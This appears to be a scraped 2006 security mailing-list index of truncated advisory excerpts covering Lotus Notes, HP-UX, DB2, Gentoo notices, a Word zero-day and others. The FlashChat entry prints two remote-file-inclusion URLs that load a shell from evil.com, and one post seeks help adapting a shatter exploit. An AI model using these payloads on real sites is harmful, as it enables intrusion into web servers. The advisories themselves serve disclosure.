Microsoft confirmed Word 0-day vulnerability
2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi)

IBM Lotus Notes DUNZIP32.dll Buffer Overflow Vulnerability
2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi)
Networksecurity.fi Security Advisory (06-09-2006)
Title: IBM Lotus Notes DUNZIP32.dll buffer overflow vulnerability
Criticality: High (3/3)
Affected software: IBM Lotus Notes versions 6.5.4, 5.0.10 and prior
Author: Juha-Matti Laurio juha-matti.laurio [at] netti.fi
Date: 6th September, 2006
Advis

[ GLSA 200609-03 ] OpenTTD: Remote Denial of Service
2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200609-04 ] LibXfont: Multiple integer overflows
2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[security bulletin] HPSBUX02102 SSRT051078 rev.4 - HP-UX usermod(1M) Local Unauthorized Access.
2006-09-06 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00614838
Version: 4
HPSBUX02102 SSRT051078 rev.4 - HP-UX usermod(1M) Local Unauthorized Access.
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Relea

[SECURITY] [DSA 1170-1] New fastjar packages fix directory traversal
2006-09-06 joey infodrom org (Martin Schulze)

[ GLSA 200609-02 ] GTetrinet: Remote code execution
2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200609-01 ] Streamripper: Multiple remote buffer overflows
2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

release uhooker v1.2
2006-09-06 Hernan Ochoa (lists core-sdi com)
uhooker v1.2 out.
What's new?: http://oss.coresecurity.com/uhooker/release/1.2/WHATSNEW_1.2.txt
gzip'd tarball: http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.tgz
zip file: http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.zip
documentation: http://oss.coresecurity.com/uhoo

Canon ImageRunner reveals SMB, IPX, and FTP username/passwords
2006-09-05 gunrnr earthlink net
The Canon ImageRunner multi-function device's Remote UI web interface software will reveal username and password pairs contained in address book entries when the address book is exported. These address book entries are used for scanning to SMB, FTP, or IPX shares. In addition, passwords for passwo

Details for BID 19586
2006-09-06 shulman imperva com
DB2 UDB - Handshake Protocol DoS Attack (BID 19586)
Background: DB2 Universal Database (UDB) is a popular database software package from IBM available for legacy platforms as well as open systems (Unix and Windows). Clients use a protocol called DRDA to communicate with the DB2 UDB server. Prot

Details for BID 18428
2006-09-06 shulman imperva com
DB2 UDB - Unauthenticated Buffer Overflow and DoS (BID 18428)
Background: DB2 Universal Database (UDB) is a popular database software package from IBM available for legacy platforms as well as open systems (Unix and Windows). Clients use a protocol called DRDA to communicate with the DB2 UDB se

Re: Microsoft Word 0-day Vulnerability (September) FAQ document available
2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi)
New information about the Microsoft Word zero-day vulnerability is available and FAQ document at http://blogs.securiteam.com/?p=586 has been updated. This issue has been assigned to CVE-2006-4534, URL http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4534 will work in the near future.
There

Reminder: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA
2006-09-06 Dave Wichers (dave wichers aspectsecurity com)
A reminder to everyone that early registration for the OWASP conference in Seattle next month ends on September 21st. There is a $50 discount for early registration. More importantly, the block of rooms and rates at the conference hotels are only guaranteed to be held until around that same date. A

[USN-340-1] imagemagick vulnerabilities
2006-09-06 Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-340-1 September 06, 2006
imagemagick vulnerabilities
CVE-2006-3743, CVE-2006-3744
===========================================================
A security issue affects the following Ubuntu releases: Ubun

Anti-vir2
2006-09-04 rugginello gmail com
By the way I'm using the progress control shatter exploit by Brett Moore, but I'm having problems with the setHandler (critical address to overwrite) and shellcodeaddr (data space to inject the code). Probably they are Windows dependent.
Do you know if there is the possibility to write a portable

Easy Address Book Web Server Format String Vulnerability
2006-09-04 revnic gmail com
Easy Address Book Web Server Format String Vulnerability
Software: Easy Address Book Web Server
Version: 1.2
Website: http://www.efssoft.com/
Description: Easy Address Book Web Server is a Web Address Book software that allows users to view, search, add, edit, or administer address books ea

in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit
2006-09-03 saudi unix hotmail com

rPSA-2006-0163-1 openssl openssl-scripts
2006-09-05 rPath Update Announcements (announce-noreply rpath com)
rPath Security Advisory: 2006-0163-1
Published: 2006-09-05
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Remote Deterministic Unauthorized Access
Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.3-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0

AuditWizard 6.3.2 gives away administrator password
2006-09-05 Terry Donaldson (tdx14145 yahoo com)
I found that AuditWizard 6.3.2 by Layton Technologies is leaving the domain administrator password in the logfiles of machines that it audits if you use the Remote Audit feature. I've contacted them but they have yet to produce a fix. They have acknowledged the problem but according to their te

FlashChat <= 4.5.7 Remote File Include Vulnerability
2006-09-04 mc nadz gmail com
NeXtMaN <mc.nadz [at] gmail.com>
Here are 2 RFI vulnerabilities in Flashchat I've found:
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http:/ /evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http:/ /evil.com/shell.txt?
video he

UPDATE: [ GLSA 200509-09 ] Py2Play: Remote execution of arbitrary Python code
2006-09-05 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[security bulletin] HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access
2006-09-05 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00760969
Version: 1
HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access
NOTICE: The information in this Sec
It is also reported that Word Viewer application is not affected.
As a workaround it is possible to avoid opening Word files from untrusted sources, including e-mail, Web p